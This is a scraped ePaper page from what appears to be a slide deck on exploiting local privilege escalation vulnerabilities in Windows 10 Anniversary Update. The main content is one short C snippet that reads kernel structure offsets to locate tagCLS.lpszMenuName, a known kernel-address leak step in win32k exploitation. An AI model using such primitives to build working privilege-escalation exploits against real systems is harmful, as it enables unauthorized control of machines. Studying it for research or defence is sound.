25.03.2017 Views

LPE vulnerabilities exploitation on Windows 10 Anniversary Update

eJwXM6v

eJwXM6v

SHOW MORE
SHOW LESS

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

Getting address of tagCLS.lpszMenuName<br />

We can easily get lpzsMenuName address by using following code<br />

DWORD64 pWndUMAddr = GetUserObjectKAddr(hWnd) - dwClientDelta;<br />

DWORD64 pClassUMAddress = *(DWORD64 *)(pWndUMAddr + 0x98) - dwClientDelta;<br />

DWORD64 lpszMenuName = *(DWORD64 *)(pClassUMAddress + 0x88);

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!